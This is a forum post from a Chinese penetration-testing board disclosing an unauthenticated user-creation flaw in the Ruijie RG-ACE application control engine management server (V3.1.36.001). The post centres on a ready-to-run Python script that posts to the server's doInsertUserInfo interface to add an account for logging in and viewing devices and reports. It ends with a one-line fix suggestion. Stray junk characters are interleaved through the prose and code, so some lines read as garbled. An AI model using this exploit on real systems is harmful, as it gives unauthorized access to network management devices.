找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2098|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
3 l* \" x( F' Z) [- z2 S5 i5 o5 s8 i0 h% l% n6 |

1 d8 y8 ?9 H, V/ ^  O, U) w测试的具体版本是; P$ h& j5 k/ B$ m0 b1 m: W
产品名称: 锐捷应用控制引擎+ L2 S2 S+ g7 E& W6 K5 S( p
版本号: 3.1.36.001 TC0 [' |; _/ g* H+ I" o) ?& X
编译时间: 201104291730  K  \: S& S1 @& }! e9 }
" s6 A6 f, N5 w, z8 {) ?* j

% |8 W9 n& U5 s2 X# Q1 w$ m漏洞证明:
$ I$ ]% n6 p& o9 M, Y6 A
" c3 O( e7 ?& e# M
4 {; p+ l4 m0 ]) V5 m1 v8 n& k. e( @$ ^9 M& t( b6 G* p* i

7 {9 H5 W; N- P- I5 _! x
3 z/ X3 s8 W. e5 G, R8 E# H
9 k# z  [4 e: R执行脚本
, W! }/ d! H) B, H- V# J2 c1 _9 a#! /usr/bin/env python" }& l: V8 A0 u7 Z4 f5 @. S
#coding=gbk: `, ?) w* Y# e/ j0 i
#RG-ACE管理服务器 V3.1.36.001
! }# W+ |, O+ w; K* Vimport urllib2, urllib,cookielib
# x, \3 A6 [# e* |7 A) vurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP: `! J+ b8 g- I7 z" G, q
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))1 k( H' r! O" u  _+ B5 ~3 z
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
- L1 R3 h3 V( Ipost=(("event","userManager.doInsertUserInfo"),, L: U+ y- g* U3 q
("useractionname","addButtonValue"),
% x4 P2 C! w  }9 E9 w, V3 H$ h("useropermanager","userManager"),
- s9 Q+ ^9 V. s" F("userName","t"), #######账号自己加) X. c0 e6 G# Q6 d6 u
("pwd","aaaaaa"),######密码自己加
( X# K6 Y& b! E- U9 T; [("trueName","ad"),
6 d8 ?  E  f/ e$ q+ L$ P- ^("email",""),4 `* w$ {+ p9 w
("mobilePhone",""),
  g" @% `+ Z0 a% q- N  a("officePhone",""),4 ]* v( z2 o1 P* G% ]
("addr",""),; j" V: s. U; C3 n( m: Q
("submit","确定"))% P- h# d; J0 ~# Z0 J* Y+ m$ ^
urllib2.install_opener(opener)
' n) n: x% \& o2 }! h& e: u+ sp=urllib2.urlopen(url, urllib.urlencode(post)).read()2 X! z) h$ X/ q: a
print "Done"5 s& G- _# O2 y3 ]
# ^9 J. s" r6 S% S% s' G
登录,连接设备
1 s" S0 w- ~' o9 T
0 @5 [9 [0 |% {" q6 e
1 c( K; h5 p& O" R, M5 H, n# h/ V
2 i. y# I8 s& B. U. b: G9 U7 f( G: C
# f6 N  o: Q4 R8 H! t, D
默认的管理员admin权限更大点# V! }* @1 p( [5 q+ \
4 }/ h$ r( A1 T% s

4 k$ q2 Y: k8 T- A% t0 a# w4 T) e- x/ s9 d) D& J+ }# {
8 {  f& b9 I# m
( r( n, L( ]- U) f% @5 d
修复方案:. s7 P! |" h7 k1 v9 A; J, l
加强对接口的权限验证; w4 K$ W! x; F. S% t6 i
2 X: C& _6 \0 ~/ L- C# |' `
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表